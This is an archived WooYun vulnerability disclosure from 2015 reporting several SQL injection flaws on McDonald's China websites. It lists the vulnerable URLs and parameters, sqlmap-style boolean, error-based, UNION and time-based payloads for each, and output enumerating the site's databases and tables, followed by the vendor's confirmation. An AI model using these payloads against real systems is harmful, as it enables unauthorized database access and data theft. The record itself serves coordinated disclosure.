当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094206

漏洞标题:麦当劳多处SQL注入打包

相关厂商:麦当劳(中国)有限公司

漏洞作者: Mr.light

提交时间:2015-01-27 17:01

修复时间:2015-03-13 17:02

公开时间:2015-03-13 17:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-27: 细节已通知厂商并且等待厂商处理中
2015-01-29: 厂商已经确认,细节仅向厂商公开
2015-02-08: 细节向核心白帽子及相关领域专家公开
2015-02-18: 细节向普通白帽子公开
2015-02-28: 细节向实习白帽子公开
2015-03-13: 细节向公众公开

简要描述:

吃了次麦当劳

详细说明:

对麦当劳进行次扫描,发现了多处SQL注入漏洞,直接打包列出来吧。
如下:
http://rl.mcdonalds.com.cn/rl/cid.php?pid=
http://www1.mcdonalds.com.cn/list/quality/index.php?DocTypeId=61
http://rl.mcdonalds.com.cn/rl/index.php?province=&city=&type2=&address=&range=&curpage=1
http://www1.mcdonalds.com.cn/list/quality/cid.php?DocTypeId=

Place: GET
Parameter: pid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=' AND 5109=5109 AND 'NysH'='NysH
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: pid=' AND (SELECT 3550 FROM(SELECT COUNT(*),CONCAT(0x7165716871,(SE
LECT (CASE WHEN (3550=3550) THEN 1 ELSE 0 END)),0x7176706671,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GtCQ'='GtCQ
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: pid=' UNION ALL SELECT CONCAT(0x7165716871,0x62664869745743486f6c,0
x7176706671),NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: pid=' AND SLEEP(5) AND 'PFWM'='PFWM


Place: GET
Parameter: DocTypeId
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (MAKE_SET - original va
lue)
Payload: DocTypeId=MAKE_SET(1992=1992,61)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: DocTypeId=61 AND EXTRACTVALUE(7998,CONCAT(0x5c,0x71626f7871,(SELECT
(CASE WHEN (7998=7998) THEN 1 ELSE 0 END)),0x716a6c6f71))


Place: GET
Parameter: province
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
Payload: province=(SELECT (CASE WHEN (7049=7049) THEN '' ELSE 7049*(SELECT 7
049 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&city=&type2=&address=&range=&c
urpage=1
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE or HAVING clause
Payload: province=-3519 OR (SELECT 4147 FROM(SELECT COUNT(*),CONCAT(0x716278
7971,(SELECT (CASE WHEN (4147=4147) THEN 1 ELSE 0 END)),0x7168766471,FLOOR(RAND(
0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&city=&type2=&addres
s=&range=&curpage=1
Type: UNION query
Title: MySQL UNION query (random number) - 8 columns
Payload: province=-9638 UNION ALL SELECT 8439,8439,8439,8439,CONCAT(0x716278
7971,0x524d6b74755453744c4a,0x7168766471),8439,8439,8439#&city=&type2=&address=&
range=&curpage=1
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 OR time-based blind
Payload: province=-1356 OR 8207=SLEEP(5)&city=&type2=&address=&range=&curpag
e=1

漏洞证明:

[*] information_schema
[*] mcdonalds_rl
[*] mcdonalds_rl_test
[*] mysql


+-----------------------------+
| admin_role |
| area |
| area_copy |
| faq |
| food |
| fooddocmanager |
| foodstandard |
| foodstandard_copy |
| foodsupplier |
| foodsupplier_copy |
| foodsupplieranddoctypematch |
| foodsupplierchild |
| foodsupplierchild_copy |
| foodsupplierchild_copy1 |
| foodsupplierdoc |
| foodsupplierdoc_copy |
| foodsupplierdoc_copy1 |
| foodsupplierdoc_copy2 |
| foodsupplierdoc_copy3 |
| foodsupplierdoc_copy4 |
| foodsupplierdoc_copy5 |
| foodsupplierdoc_copy6 |
| foodsupplierdoc_copy7 |
| foodsupplierdocstyle |
| foodsupplierdoctype |
| foodsupplierdoctype_copy |
| foodsupplierfile |
| foodsuppliergroup |
| foodsuppliergrouplist |
| foodsuppliergrouplist_copy |
| foodtype |
| log |
| mc_log |
| mc_mail_log |
| mc_mail_title |
| mc_manager |
| mc_manager_suppliergroup |
| mc_partner |
| mc_role |
| rl |
| rl2 |
| rl_copy_20150111 |
| temp |
| temp1 |
| temp2 |
| temp3 |
| temp4 |
| temp5 |
| temp52 |
| temp6 |
| temp7 |
| temp8 |
| temp9 |
+-----------------------------+


Database: mysql
[23 tables]
+---------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------+


修复方案:

过滤

版权声明:转载请注明来源 Mr.light@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-01-29 00:30

厂商回复:

网站存在SQL注入问题发现已久,由于采用托管模式,修复漏洞需要一定时间。

最新状态:

暂无


漏洞评价:

评论